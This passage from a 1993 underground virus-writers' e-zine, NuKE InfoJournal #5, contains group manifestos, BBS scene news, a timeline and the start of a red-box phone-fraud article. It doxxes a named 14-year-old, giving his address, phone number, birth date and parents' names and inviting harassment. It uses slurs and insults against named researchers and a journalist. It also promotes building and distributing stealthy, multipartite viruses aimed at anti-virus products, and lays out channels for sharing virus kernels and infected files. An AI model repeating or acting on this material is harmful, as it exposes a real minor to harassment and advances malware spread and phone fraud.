ZINES — underground e-zine archive source
text size: CRT glow:
~/ENGLISH/NuKE InfoJournal/nk-info5
===========================================================================
                       NuKE Info Journal #5                                
                       ~~~~~~~~~~~~~~~~~~~~                                
                          March 13, 1993                                   
                          ~~~~~~~~~~~~~~                                   
                                                                           
Article Topics.                                                            
~~~~~~~~~~~~~~                                                             
1. Halt! Who Goes There? (An Intro from Rock Steady)                       
2. State of 708 (An Intro from Nowhere Man)                                
3. NuKE Australia                                                          
4. NuKE TimeLine                                                           
5. DTMF Generator  and Structural Design to Red & White Boxing             
6. IBM 4700 Unix System, Why are these Bank System Popular?                
7. An Intro to Red Boxing                                                  
8. McAfee 's ViruScan complete Virus signature listing                     
9. Viral Group? or Viral WareZ?                                            
10. V.C.L. v2.0 Update                                                     
11. Data Encryption Standard                                               
12. Disinfection on Fly, for your virus                                    
13. Infection on Closing for your virus                                    
14. Multipartite Viruses                                                   
15. Daemaen Virus                                                          
16. Sunday Telegraph Interview with Barbara Lewis                          
17. NuKE PoX v2.0 Sources                                                  
18. 1024 SBC Sources                                                       
19. Cyberculture                                                           
20. Truth on Gary Watson                                                   
21. Files Included in this Info Journal                                    
22. Credits and Site Listing                                               
===========================================================================
===========================================================================
Who Goes There? - A Fast Intro                                             
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                             
                                                                           
Greetings, my fellow cipher-associated phreaks, and welcome to a fifth     
issue of our "Informational Journal" by NuKE associates, otherwise         
expressed as our "InfoJournal" for short. It has been perhaps a long       
while since our last InfoJournal; many thought we died out, as we had      
calls from our local AV (AntiVirus) community to check it out. I blame     
the long length on re-structuring, being new here I forgot I had an        
InfoJournal to produce, and lastly to them k0ol guys that want to          
take our butts and lock us up and throw away the key. "We're back!!!"      
                                                                           
The new InfoJournal has under gone new structural changes, the biggest     
being the bi-structural format: you can either execute the small           
5k Hypertext file to read this like in our previous releases, or you       
can take out your favourite editor and read the (NK-INFO5.TXT) directly.   
Nevertheless I do hope you will execute the small 5k Hypertext file as     
it contains features that are not in the data file, and it does a          
CRC-32 checksum check on the data file to make sure it has not been        
tampered with. Anyhow this may be the LAST InfoJournal in Hypertext format.
We may present a text-only file soon enough, as we intend to make the      
release dates a little more frequent; perhaps a monthly journal seems to   
be in our interests right now.                                             
                                                                           
New structural changes have been introduced into NuKE. I (Rock Steady)     
am perhaps the administrator of NuKE, as I play an active role in this     
dictating body, but nevertheless we also have other associates             
co-administrating NuKE with myself: Nowhere Man, Phrozen Doberman and      
Savage Beast are the other key-members, and we can not forget our latest   
additions, Screaming Radish and TäLöN.                                     
                                                                           
Our goal today is not a "perfect" group, nor do we wish to rule the        
scene, far from the truth. In a world that is so corrupt, we try to bring  
order and truth! The idea of creating "robots" to perhaps reach out        
and set an example that we cannot be stopped is amazing! Yes, we have      
created viruses beyond the scope of the narrow minded AV world -- in that  
we are in control, and if what me must do is discredit your software then  
by-darn-it we will.                                                        
                                                                           
I hope to set an example with this organization we call "NuKE" -- we       
certainly DON'T think of NuKE a "just a" group. Normally a group is        
localized, but in our case the most powerful members are scattered on      
three different continents! Certainly we are not here to assimilate        
anyone, we simple wish to co-join ideologies. We call ourselves            
"anarchist." We suffer from injustice and repression brought upon us and   
every non-illiterate computer user by the AV world. With that we looked    
into our world, the sister world, the light of freedom in the dark night!  
Yes, we may be "underground" but our alienation gives us the upper hand    
over the AV world. We certainly know that our output perhaps will profit   
AVers and crush the small guys, but until the day comes that people        
understand that a piece of code is only code and not a biological hazard,  
our work is not done. All we wish to do is to simply to bring out the      
truth, nothing more, no conquering of the world, no destruction of         
computer networks, and certainly no one falling to our mercy for help. We  
give you what the butt-tight corporates hide from you. All we say is open  
your eyes, mature a little: Michelangelo will not cause every computer on  
the 6th day of March to die, rather it was more of a publicity stunt so    
that you will fill the AVers' pockets!                                     
                                                                           
One amazing case is if "Rock Steady" trades a virus with a buddy, this     
is this OUTLAWED, and we are pointed out to be the "Evil Hackers," but, if 
an AntiVirus person such as Frisk were to trade viruses with Joseph Greco, 
this is labelled as "the research of viruses." We, too, research our       
viruses, but we take an additional step forward -- we also research the    
AntiVirus products and label all of their flaws! But since we do that, the 
butt-tight corporate AntiVirus people label us as evil-doers. We are flesh 
just like yourselves.                                                      
                                                                           
     "Fame is really your WORST enemy." (Tormentor/DY)                     
                                                                           
Perhaps the smartest quote I've seen, taken from my bud Tormentor, of      
Demoralized Youth.                                                         
                                                                           
Nevertheless, I present to you this InfoJournal #5; apparently NuKE        
developed farther than ever expected! And we cannot mimic anyone as        
there is NO ONE to mimic. From here on NuKE is treading upon "unknown"     
territory, and you will see that in the articles presented here. The       
advances are "mind-boggling!" History is in the making!                    
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================
===========================================================================
The State of 708                                                           
~~~~~~~~~~~~~~~~                                                           
                                                                           
Welcome to another exciting article detailing the triumphs and             
tribulations of everyone's favourite LATA, the 708/312 (Chicago) area.     
Since the last InfoJournal a few events have come up which deserve         
special attention, specifically the loss of two of the area's best boards, 
Ripco ][ and Nun-Beater's Anonymous, and changes at The Hell Pit. Read on  
for more details...                                                        
                                                                           
Ripco -- R.I.P.?                                                           
~~~~~~~~~~~~~~~~                                                           
Perhaps the most famous board in this area is the legendary Ripco ][,      
a text/message-oriented board run by Dr. Ripco. Ripco, in service since    
December 1983, is the area's, perhaps even the nation's, most established  
underground board, and draws hundreds of users from all over North America 
and had a huge collection of historic text files. However, Ripco is        
probably best known for it's role in the Operation Sundevil crackdown of   
1990, during which U.S. Secret Service agents broke into Dr. Ripco's       
apartment, detained him without cause, and seized all of his computer      
equipment, including the Ripco BBS. Due to complete lack of evidence, Dr.  
Ripco was set free, and Ripco went back up later that year with donated    
software and equipment. Now, in 1993, Ripco has suffered another blow.     
On January 21st, Dr. Ripco decided to change his hard disk controller;     
being a prudent man, he backed up all files first using FastBack Plus (this
was the fatal mistake). After reformatting his drives, the new controller  
failed to work properly. When he did a restore, however, he was in for a   
nasty surprise -- Fastback had failed him, and nearly all of his files were
unrecoverable. Luckily, the key system files and user logs were intact,    
but most of the file bases were gone forever.                              
Dr. Ripco requests that if you have any of his old files, that you         
re-upload them to Ripco ][ (the number is +1-312-528-5020) or mail them    
to him at his post office box (Bruce Esquibel, P.O. Box 18169, Chicago,    
Illinois 60618, USA). Dr. Ripco says he'll be happy to reimburse you for   
disks and postage. I encourage everyone to chip in and support Ripco in    
another time of need.                                                      
                                                                           
Then, on March 7, there was another shocking announcement at Ripco. The    
following are the highlights of the message that Dr. Ripco requested be    
passed on to the general public:                                           
                                                                           
                                                                           
"this is a bit difficult to do but it's got to be said.                    
                                                                           
technically the board isn't closing and going away forever but some major  
changes are going to take place shortly and for all practical reasons, it  
probably isn't going to exist as you now know it.                          
                                                                           
for about the last year, myself and several indivduals on the system have  
been toying with the idea of getting the system on internet. if you are not
familar with internet, it's a world-wide network of computer systems which 
basically makes a 100 line 6 gig private bbs look like a c-64 running off  
one floppy.                                                                
                                                                           
the problem however is public access to it. most of you that have used     
internet find out about that hard lesson sooner or later. chicago seems to 
be one of the few places in the area where public access is a challenge.   
                                                                           
i'd like to change that.                                                   
                                                                           
...to continue on with this project it has come to the point of dropping   
dos completely and switching the system over to UNIX completely. this means
the program and the bbs as you see it will be dumped.                      
                                                                           
not to keep your hopes up, what will be used to replace it will look like  
garbage initially. it'll be difficult to use and hard to figure out unless 
you have some prior UNIX experience.                                       
                                                                           
although i cannot be more specific on the new system at this time i do want
to say that ripco ][ will be put into a suspended state, in case everything
falls through and the project is abondoned, i promise to put things back to
the way it was.                                                            
                                                                           
so this isn't quite goodbye, just a vacation of sorts."                    
                        -- Dr. Ripco                                       
                                                                           
So it seems for now that Ripco ][ is gone, at least for a while. As of the 
release of this InfoJournal, Ripco is still up, although file access has   
removed. Let's hope for the best...                                        
                                                                           
                                                                           
The Marty Zwikel Affair                                                    
~~~~~~~~~~~~~~~~~~~~~~~                                                    
In October 1992 a local loser named Repeat Offender (real name: Marty      
Zwikel) decided that, given the fact that had managed to actually talk to  
Rock Steady, he was a bonda-fide NuKE member. Before anyone was able to    
stop him, Marty decided to have a flame-war with Phalcon/SKISM over VX_NET.
Marty made false accusations toward Phalcon/SKISM (which I will not repeat 
here), then accused GarbageHeap and Count Zero of lying to him, and falsely
claimed that Rock Steady and myself supported his statements. He even had  
the audacity to add the NuKE signature after his name. Luckily cooler      
tempers prevailed, and everyone came to realize that he was just a local   
geek posing...he soon left the net, after complaints by all parties. For   
those of you who may be under the mistaken belief that "Repeat Offender"   
is in any way affiliated with NuKE (or ever was), THIS IS NOT TRUE. In     
actuality, Mr. Zwikel is a fourteen-year-old local fuck who tried to make  
the big leagues and made a fool of himself. Let's take a closer look at    
this asshole, shall we?                                                    
                                                                           
Marty Zwikel is a 14-year-old male (we think) who's currently a freshman   
at Buffalo Grove high school in Northwest suburban Chicago, where he has   
earned the nickname "Adolf." Why, you might ask? A few classmates of his   
chose this because "he's a stupid computer geek who has no friends and     
everyone hates him and we think he'll grow up to be crazy and so we call   
him Adolf," they say. A year or so ago he ran a board called "No Bitches   
Allowed" under another handle; luckily this immature punk was taught a     
lesson by an irritated user (who chooses to remain anonymous) and          
No Bitches Allowed was successfully taken down.                            
                                                                           
But Marty wouldn't learn. He brought his board back up as "The Altar,"     
a K-RaD 0 WaREZ board and assumed the handle "The All Powerful." Then      
he caught the H/P/V craze (as has most of 708, ugh) and changed his handle 
to "Repeat Offender," after a lame Richard Marx album. Then he publically  
announced on Nun-Beater's Anonymous that he was starting a "secret crashing
group" called Children of the Night, and immediately mailed me demanding   
to co-op with NuKE. When asked what his one-man group has actually done    
he said "I can't tell you which boards I've crashed because you might be   
friends with the sysops and get angry at me." (In other words, nothing.)   
Then came this incident over VX_NET. Now Marty has joined a local          
anti-Semitic crashing group which has been harassing and crashing boards   
all over the area. Will this kid ever learn?                               
                                                                           
Marty Zwikel lives at 3906 Mitchel Drive in Arlington Heights, Illinois    
with his father, Dean, and his mother, Susan. Perhaps you'd like to speak  
to him voice...you can reach him at +1-708-506-1980. As previously         
mentioned, Marty was born on July 28, 1978 and has blighted the world ever 
since. Perhaps some of you will find this information useful. I sure       
have...hehehe.                                                             
                                                                           
Nun-Beaters Goes Down                                                      
~~~~~~~~~~~~~~~~~~~~~                                                      
In early November 1992 Guido Sanchez, BLaH president and all-around wacky  
dude, took down Nun-Beaters Anonymous, his world-famous BBS, for           
undisclosed personal reasons. N.B.A., as it is known, was best known for   
it's zanny message bases, sysop access for first-time callers, and         
complete and total lack of sysop control. In fact the sysop actually       
encouraged people to leech entire file bases at one time, disabling all    
file restrictions for all users and adding a special "/LEECH" command just 
for that purpose. According to Guido, N.B.A. should be back sometime soon, 
but, although it might have a software change, will maintain it's          
free-wheeling tradition. "It should be back up this summer," says Guido.   
"Actually, I don't know when it'll be back up, so whenever you're bored    
put it in the re-dial queue and you might get lucky. The number is         
+1-708-251-5094. Kick the habit, call N.B.A. today!"                       
                                                                           
As an interesting side-note, Nun-Beaters Anonymous was mentioned in        
Boardwatch Magazine (a print publication) for having an unusual name.      
"We don't even want to know," Boardwatch wrote.  The strange thing about   
this is that N.B.A. had been down for four months when this was published. 
                                                                           
                                                                           
Changes at Hell Pit                                                        
~~~~~~~~~~~~~~~~~~~                                                        
The Hell Pit, NuKE's only active Chicago site, and perhaps Chicago's only  
remaining quality BBS, has been undergoing some changes recently which     
deserve mention here. First of all, Kato, one of the system's two sysops,  
has gone away to university, leaving Hades as the board's only acting      
sysop. All messages concerning the system should be addressed to him,      
*not* to Kato. Kato logs in very rarely, and only has time to read normal  
private mail. Hell Pit has also purged the user list recently of the many  
users who don't call regularly, don't do anything put leech, etc. This is  
in response to the growning scarcity of disk space (though there is talk   
of a disk upgrade) and the tremendous in-use time of the system. FidoNet   
was dropped due to lack of intrest, so now Hades is in the process of      
(finally!) adding NuKENET.                                                 
                                                                           
Again, contrary to rumour, Hell Pit is *NOT* a fed board. This rumour      
continues to resurface from time to time, but is just as untrue as ever.   
The Hell Pit is still active, too; some people have speculated that it's   
down, since the line is always busy. That's normal, folks -- Hell Pit      
is in use perhaps 85% of the time. So set your modem to wardial and call   
The Hell Pit at +1-708-459-7267 today!                                     
                                                                           
                        Nowhere Man/NuKE                                   
===========================================================================
===========================================================================
IJ #5 Comments by Phrozen Doberman, NuKE Australian Rep                    
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                    
                                                                           
Intro                                                                      
~~~~~                                                                      
When most people think of Australia, they remember a famous Australian     
movie, _Crocodile Dundee_. Some instantly assume that we shave with        
six-inch knives and keep crocodiles as pets. Maybe the feds do, but not we 
at NuKE. Yes, we have defiantly joined the group of countries which are    
endlessly advancing in computer systems technology.                        
                                                                           
Before now, no-one had intended to put Australia on the map of countries   
where viruses are written. But time can not be separate from change, and   
changed we have. This year, three good .ASM coders from Australia joined   
NuKE in an effort to reach a common goal. Distance, race, religion and     
language put aside, they all put in their two-bits worth, so everyone could
benefit (Frisk/McAfee _NoT_).                                              
                                                                           
But the year has just begun, and it looks like it will be one that we won't
forget. 1992 was the year of development, the year of brainstorming and    
virus  writing. 1993 is the time when we wrap our presents up, when the    
emphasis changes from mass writing to organized virus implementation.      
                                                                           
Gone are the days of the passive virus. The virus that runs, infects and   
destroys. Frisk/Tbave have put an end to that. Now, its _their_ turn. The  
active virus is here to stay, and it shall stay as long as we can keep it. 
As virus writers, we all know our direction needs to change. The user is no
longer the ultimate target, now we are to aim at destroying every last     
piece of user confidence in Frisk/McAfee software.                         
                                                                           
NuKE's philosophy has changed over time, and like any philosophy, it should
be allowed to change. One must never under-estimate the power of experience
and thus we have come to the believe that:                                 
                                                                           
         By attacking computer users, we gain nothing and anti-            
         virus vendors gain all, but by attacking anti-virus               
         products, we not only inundate the anti-virus companies           
         with more work, but destroy the users confidence in their         
         programs.                                                         
                                                                           
This is the philosophy that will put the fear into every anti-virus vendor,
and now it is they who will have to face this reality. We realize what     
Frisk/McAfee _want_ us to do, to continue doing what we have in the past,  
but we know better than that. If there is one thing I would like to teach  
McAfee/Frisk it would be to show them that they aren't dealing with any    
bunch of smart kiddies, because now we will become as organized as them.   
                                                                           
One could consider such a result of this philosophy. For every user who    
loses confidence in Frisk/Mcafee and returns to NAV/CPAV, we are giving our
future viruses a much better chance of survival. Frisk/McAfee deal the     
cards, they _have_ the support of the IBM PD world. NAV/CPAV receive the   
cards, thus they lack in keeping updated. This is what we need to exploit. 
                                                                           
I'm not going to sit here and make statements that I don't believe in. Nor 
could I be bothered using this introduction as some egotistical experience.
I  am here to tell you, the follower, onlooker, or participante of NuKE,   
that we are not just any underground group.                                
                                                                           
I admit, I can't write a virus for shit. In fact, my role in NuKE has      
nothing to do with viruses. My best contribution to NuKE is in it's        
management. I can only tell you using the knowledge that I have learnt over
time, that no matter how good your programmers are, no matter how good     
your tutorials are, no matter how good you can hack or crack               
F-prot/McAfee, it will be wasted if it's not implemented properly.         
                                                                           
I only want one thing from NuKE. I want to see the group reach its full    
potential. If I can help make the basis of a NuKE a platform more suitable 
for other experienced programmers to use, then that is what I aim to do.   
This is the year where NuKE will be reforming many of its practices. You   
are not just observing a group of highly skilled programmers, going about  
their work, but a group with a highly organized structure.                 
                                                                           
Organization is the way NuKE will survive. It is how we can stop the       
Frisk/McAfee team beating us. It can help us in every way, shape and form, 
with beta-testing, virus distribution, info distribution, nukenet          
management, and most importantly, a single combined push for the active    
anti-Frisk/anti-McAfee virus code.                                         
                                                                           
This is not the time or place to start talking about NuKE-Net organization 
in depth. NuKE-CoNF will deal with that. What is NuKE-CoNF? In short, it is
going to be a detailed system analysis of NuKE, so we can optimize our     
procedures, and not just make them into efficient ones, but the best.      
                                                                           
Anyone can contribute to NuKE-Conf, so long as you are a NuKE member or    
associate. VX/P-S associates may also contribute ideas. All submissions    
will  be worked over, compared with other submissions, and modified if     
necessary.                                                                 
                                                                           
Unfortunatly, NuKE can not guarantee that results of NuKE Conf will be     
published.                                                                 
                                                                           
Before I continue, I make one pledge to all those reading this. If we, as  
virus writers, want to archive our goals, then we need to work together. We
need to understand our weaknesses and our strengths, and improve our       
systems where possible, for any group which can do this does not just      
exist as a magnetic particle on a hard disk somewhere on someone's computer
but continues to succeed with the spirit of every participating member, the
spirit of NuKE.                                                            
                                                                           
        Thank You.                                                         
                                                                           
        Phrozen Doberman                                                   
        Melbourne, Australia                                               
        22nd February, 1993                                                
                                                                           
                                                                           
New Info                                                                   
~~~~~~~~                                                                   
I am now beta-testing a Tic File Distribution link between myself and      
Screaming Radish. It seems to be working fine, and if implemented, all     
members will benefit. First, however, let me explain what "TiC" is all     
about.                                                                     
                                                                           
"TiC" of TDF (Tick File Distribution) as we will refer to it is a way in   
which NuKENET BBS's can transfer files between each other in a very simple 
an automatic way. "TiC" will attach a hatched file (that is, a file you    
intend *everyone* to have, ie: InfoJournals) to your Front Door,           
D'Bridge or similar Fido-standard-compatibile mail handler. A quick        
example: Rock Steady wants to release a new virus, but he wants to make    
sure everyone gets it. He places a .ZIPped copy of the viruses kernel in a 
special area where his "TiC" processor (ie: FileMgr) will identify this    
virus as a new file to be hatched.                                         
                                                                           
His "TiC" processor then determines what systems are in the export list,   
and attaches this file (as a netmail file attach) to each node in the      
export list, along with a file with an extension ending in .TIC. Inside    
this .TIC file, is the file areas name, a description and seen-by's.       
                                                                           
                I suggest that the following areas are set up:             
                                                                           
        VIRUS_BETA      =       Internal beta-testing viruses.             
                                Never to be released.                      
                                Only for members.                          
                                All bugs reports via NuKENET.              
                                                                           
        VIRUS_FINAL     =       Final kernels of viruses.                  
                                _MUST_ have been beta-tested.              
                                Not for release to the general             
                                public.                                    
                                                                           
        VIRUS_INFECT    =       Infected programs with the virus           
                                so we may under "beta-testers."            
                                                                           
        VIRUS_SOURCE    =       All virus source.                          
                                                                           
        VIRUS_EXTRA     =       Odd things. Including IJ's.                
                                                                           
                All comments, via NuKENET please.                          
New Memberz                                                                
~~~~~~~~~~~                                                                
        I'd like to announce the following new NuKE members:               
                                                                           
                Screaming Radish - NuKE Aust. Vice Rep                     
                Shindaq Arl'hur  - Member                                  
                The Wierd One    - Member                                  
                TäLöN            - Member                                  
                                                                           
Left Memberz                                                               
~~~~~~~~~~~~                                                               
I'd like to announce the following memberz have left:                      
                                                                           
                    Lord Venom and Screaming Jesus                         
                                                                           
            The Pit BBS is *NO LONGER* a NuKE support BBS.                 
                                                                           
Memberz Analysis                                                           
~~~~~~~~~~~~~~~~                                                           
Although there existed a stage where I was the only NuKE Australian member,
the festive season has brought many a virus writer out of the closet. The  
three new members, S.R., Shindaq and TäLöN, all have previous experience   
with writing viruses.                                                      
                                                                           
Screaming Radish: is extremely skilled in stealth and memory               
~~~~~~~~~~~~~~~~  addressing techniques, saying such a statement is like   
saying the E=MC² was an okay formula. SR is MC², SR has abilities never    
dreamed about. You have a problem SR will get you a solution! We hated that
memory loss in TSR Viruses, so SR got us a routine to steal buffers from   
DOS, and used those as allocating a virus! As DOS buffers are about 512    
bytes each, stealing 3-4 will result in no harm to the system and NO MEMORY
CHANGE AT ALL! Amazing! And we laughed at Proto-T? And the list goes on... 
                                                                           
Shindaq: Has been disabling viruses for a few years, and specializes       
~~~~~~~  in dropper-type viruses. He has also written a dropper-type virus 
from scratch.                                                              
                                                                           
TäLöN: Has been a virus writer for years, here's his background, in his    
~~~~~  own words:                                                          
                                                                           
"Hi there, I am typing to you from the Newcastle, New South Wales,         
Australia. I am not new to the virus scene, in fact I was a member of the  
puppet group [PuKE].                                                       
                                                                           
Just a quick background on PuKE: it was set up about a year ago by Harry   
McBungus (who wrote X-Fungus, No Frills 2.0 and No Frills 3.0, all         
unremarkable) simply as a stuff-around, paying out on NuKE. Harry saw NuKE 
getting large egos over large, non-resident direct-action viruses: in other
words he though they were idiots. Hence, PuKE endeavoured to write things  
which compared to NuKE WareZ but on a far smaller code scale. The fruits of
Harry's labours were 'stolen' by myself, however, and that is how they grew
in the wild; otherwise they would not be around.                           
Although PuKE disliked NuKE, everything grows in stages, people mature, and
since then NuKE has evolved into the best Power Virus Group in the world.  
                                                                           
(As a side note, Harry left the scene in around June 1992, as a result of  
something called a Fraud squad. Good luck to Harry in whatever he is now   
doing.)                                                                    
                                                                           
I, TäLöN, defected to NuKE shortly after writing the Dudly virus (also     
known as No Frills 4.0 and V2P6Z Mark 2, which was stolen off me by        
someone hacking into my board. I had no intention of releasing it into the 
wild. It's unremarkable besides its lame polymorphism, which is similar to 
V2P6 in end result, not generation)                                        
                                                                           
I have not added anything to the virus scene since the writing of Dudley-1,
but grew active a month ago with the creation of another, yet-to-be-named  
virus, namely a 3k COM/EXE/SYS/BIN/OVL/MBR/BS infecting, polymorphic       
stealth virus. It hides partition infection; it hides file size increase on
directory; it infects boot sectors of ANY floppy format, current or future,
on read/write access; it infects hard disk partition on infected disk boot 
or infected file execution on virgin system, and so on. One mother of a    
virus.                                                                     
                                                                           
However, I have taken great care not to make it destructive in anyway, so  
no stupid AV researcher can point the finger spin the typical anti-virus   
rhetoric, 'Bad virus, bad virus, didn't you know every virus will destroy  
precious hours of work.'                                                   
                                                                           
My opinions on AV researchers in general is very low. I take great pride in
totally debunking their theories and stereotypes. I am NOT a social        
recluse. I do not have a sunken chest, nor am I fat or a cowardly          
insignificance. I possess a fair degree of common sense. I do not go out of
my way to trash boards or computers; in fact I steer away from such things.
Furthermore, I do not view virus writing or the discussion of viruses a    
taboo subject.                                                             
                                                                           
Most of all I do not try to keep the public in the dark about what viruses 
can and cannot do. Harry McBungus shared basically the same views but when 
he tried to speak out and 'educate' the public, he instead got nailed by   
the press. (The media is another of my pet hates.)                         
                                                                           
Anyway I have lost patience with hierarchy and bureaucracy... and the      
media, the government and the public can basically suck John McAfee's dick 
while he laughs all the way to the bank. We have provided and income for   
John for long enough, it's time to make SCAN look like the total crock of  
shit that it has always been.                                              
                                                                           
Before I leave, just a few quick hi's, ho's and 'thanks' to:               
John McAfee: Fuck You                                                      
Patricia 'It is unknown what this virus does besides replicate' Hoffman:   
        How about you get a clue before you make out you're the big-wig    
        virus analyzer. VSUM is the biggest farce since ViruScan itself.   
Sara Gordon: for all the laughs your ridiculous psychological theories     
        about virus writers gave me. Try a bit harder.                     
Matt: for all the cool times we had. The legend of the 50-cent piss-up     
        will never leave my memory banks.                                  
Pantera, Metallica: for providing an awesome soundtrack for virus          
        development!                                                       
and to NuKE for making everything possible.                                
                                                                           
                        TäLöN/NuKE"                                        
                                                                           
All in all, you will be seeing a lot more from NuKE Australia this year. We
have refocused on the job, have a brand-new line up (new blood rarely does 
harm) and we have a direct vision for the future. All of this would be hard
to archive without the coherence, unity and strength of NuKE!              
                                                                           
Final Note                                                                 
~~~~~~~~~~                                                                 
Here is where you all get your compliments! A big thanks to Rock Steady,   
for keeping the NET alive. Overall, he has managed NuKENET in the best way 
possible, and this does deserve some positive feedback. I would also like  
to thank him for all the charges he has incurred while keeping the NuKENET 
link alive! Yes, NuKENET pays for its calls. No illegal crap in our camp!  
                                                                           
Secondly, I would like to thank Nowhere Man for supplying us with          
beta versions of NED, Screaming Radish for helping me when I needed        
suggestions and technical advice, Shindaq for keeping the BBS alive, TäLöN 
for helping out and keeping your cool, and last but not least, Savage      
Beast for keeping an excellent database of viruses.                        
                                                                           
         Hubbada, Hubbada, and good virus writing to you all....           
                                                                           
Please address all correspondence to: Phrozen Doberman,111:950/3@Nuke_NET  
                                                                           
                        Phrozen Doberman/NuKE                              
===========================================================================
===========================================================================
A NuKE Timeline                                                            
~~~~~~~~~~~~~~~                                                            
-------------------------------------------------------------------------- 
October 1992                                                               
NED (NuKE Encryption Device) is completed, an encryption engine that is    
very simple to use, yet overcomes all of the "flaws" of MtE to become      
perhaps the wildest engine out, with an ability to understand code and     
compile its very own code. Amazing. VCL v2.0 will "field test" the success 
of this NuKE product by Nowhere Man.                                       
-------------------------------------------------------------------------- 
November 1992                                                              
NuKE-PoX Virus version 2.0 noted as a common North-American virus in VSUM. 
-------------------------------------------------------------------------- 
November 1992                                                              
NuKENET joins with VX_NET from ARiSToLE's board.                           
-------------------------------------------------------------------------- 
November 1992                                                              
NuKENET is extended not only to Australia, but, with the help of Savage    
Beast, is also expanded to Europe. Demoralized Youth of Sweden gets on     
NuKENet, along with other supporting countries like the Netherlands,       
Switzerland, and Bulgaria.                                                 
-------------------------------------------------------------------------- 
November 1992                                                              
NuKE encounters "Death Angel" of Toronto, the virus programmer of the      
original ONTARIO-512 and ONTARIO-1024 (aka 1024-SBC). Death Angel made     
himself a NuKE supporter. In our InfoJournal #3 we dissassmbled the        
Ontario-512 virus, and as a result the Ontario-730 was derived from it     
(which was NOT programmed by Death Angel!). Both viruses got listed as     
common viruses in North America! Death Angel also gave us his original     
source of Ontario-512 and -1024 (which we enclude in this issue).          
-------------------------------------------------------------------------- 
December 1992                                                              
Screaming Radish joins up with the NuKE Team. His abilities with the 80x86 
are mind-boggling and is known for the best all-nighters that I've ever    
seen... Even though relations with Screaming Radish go "WAY-BACK" (he was  
considered part of us for a while), only NOW did Screaming Radish          
officially join NuKE by being completing his "test-of-NuKEhood" in the     
Australian outback, and as a proven hacker he succeeded in hiding his      
tracks and killing the Bushmen and crocodiles on his tail...<hehe> [What   
can I say, it's tough to become a Aussie-NuKEer! :-)]                      
-------------------------------------------------------------------------- 
January 10th, 1993                                                         
TäLöN enough respect goes out to this charm... He too has succeeded the    
wild-bush hunt of the Aussie, though he was never the same afterward...    
<hehe> Just as Compton was put on the map by the Brothers, TäLöN is the    
one to put Aussie onto the map. For that I gave him a whole paragraph      
in this intro...                                                           
-------------------------------------------------------------------------- 
January 10th, 1993                                                         
Paul Ferguson thinks he's an amazing god with connections (for the local   
strawberry club) since he knows how to use Directory Assistance and called 
NuKE up! Big-ol' Pauly cried on our shoulders that [and we quote]          
     "ITS A POLYMORPHIC WAR OUT THERE! (sob, cough, snort)"                
Huh? Paul got a copy of TPE. (Yeah right! He heard of it and wanted to know
if we had it!). All in all Paul showed himself to be a powerful man, with  
very powerful friends, and was able to prove that he was THE god being     
able to crush us with a snap of his fingers. For this NuKE awarded Paul    
with the NuKE Wanker of the Year award. It's the FIRST time NuKE presented 
such an award, so we named it after Paul, therefore with respect we now    
call it...                                                                 
   "The NuKE Big-Ol' Paul Ferguson Wanker Award"                           
We were going to send him a picture of a horse's ass and sign it, but we   
figured a mirror will be pretty much be the same, but cheaper...           
-------------------------------------------------------------------------- 
January 24th, 1993                                                         
Daemaen Virus created by TäLöN. This virus will infect ANYTHING that       
moves. It will infect .EXEs, COMs, OV?s, SYSs, BINs, floppy boot sectors,  
and HD partition tables. It also contains a dir-stealth routine, and will  
infect files on open, creation, close, browsing, attribute functions, you  
name it... A very fast, extremely fast infector. Its features will be      
embedded inside VCL v2.0, coming soon in a computer near you...            
-------------------------------------------------------------------------- 
February 1993                                                              
The Weird One and Shindaq Arl'hur have joined the NuKE team. Their         
abilities are also well spoken of, being amazing guys and an asset to the  
Team. (Though it'd be cooler it they talked a little more...<Hehe>) Hiya'  
Guys!                                                                      
-------------------------------------------------------------------------- 
February 1993                                                              
The Dark Elf Virus, by Shindaq Arl'hur, comes alive. It is another         
multipartite virus that infects boot sectors and HD Partition as well as   
.EXE and .COM files. With stealth boot abilities it too will have its      
features embedded inside VCL v2.0.                                         
-------------------------------------------------------------------------- 
February 2nd, 1993                                                         
Rock Steady goes to the local post office and mails two letters to two NuKE
members whom will remain unknown (Phrozen Doberman and TäLöN) and yet where
did the letters end up? [Thanks for telling me you got 'em! NOT!]          
-------------------------------------------------------------------------- 
February 8th, 1993                                                         
ARCV of England gets busted BIG-TIME. Apache Warrior and his followers are 
charged with computer fraud for the purpose of causing damage with         
self-replicating code (viruses). England flips, and the nation of n0-Crimez
wonders how to control this loop in the hole. An "example" is supposed to  
be made of the group to scare others from repeating their actions!         
-------------------------------------------------------------------------- 
February 15th, 1993                                                        
Barbara Lewis from the English newpaper  _Sunday Telegraph_ calls up       
NuKE for a one-on-one interview.  The bitch got nothing, as we've already  
visited Compton. But she pulled a strawberry act on us -- yup, she gave us 
her number, and now NuKE and Barbara got a hot "soap-opera" relation going!
Our favourite "girlfriend-boyfriend" saying is "Bitch, get off my wanker!" 
-------------------------------------------------------------------------- 
March 1st, 1993                                                            
Rock Steady had a vision of releasing the NuKE InfoJournal today, but      
federal officers thought otherwise... [BiTE Me]                            
-------------------------------------------------------------------------- 
March 12th, 1993                                                           
After visiting Compton, Rock Steady had the sudden urge to rap out the     
words to the song "Fuck Tha Police" by NWA while entering the station with 
a logo "Blow away the pigs" embedded on his t-shirt, visiting his parole   
officer...                                                                 
-------------------------------------------------------------------------- 
===========================================================================
===========================================================================
DTMF Generators, White Boxing, and Red Boxing                              
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                              
                                                                           
I've seen before me way too many fabrications of red boxes; the H/P        
community enjoys to talk about it a lot, and fantasize about its abilities.
But seldom do I see an accurate example of any box construction. Perhaps   
I'm simply in the wrong circle? Nevertheless I did a little research on    
the actual structure of an DTMF Generator and on how to convert this into  
a red and white Box. 2600 Enterprises did have the BEST red box example to 
pass before me, however in Canada legislation differs quite a lot, and     
any kit or package that can be hacked is not tolerated; so therefore the   
famous Radio-Shack Pocket Dialer is not available here, and I would say    
many other places, such as Europe or Australia, where Radio Shack is not   
as widely established as in the USA. Our Radio Shacks are no bigger than a 
local corner candy store, and the only useful products they sell are       
calculators. Pathetic is the scene I run into everywhere I go in lovely    
Canada. So since the Radio-Shack Pocket Dialer WITH MEMORY is not available
I guess we must build the actual device from scratch. It's fairly simple,  
and I've already succeeded in building the DTMF Generator. It's very       
easy -- it consists of one IC, a crystal to control the oscillator (in     
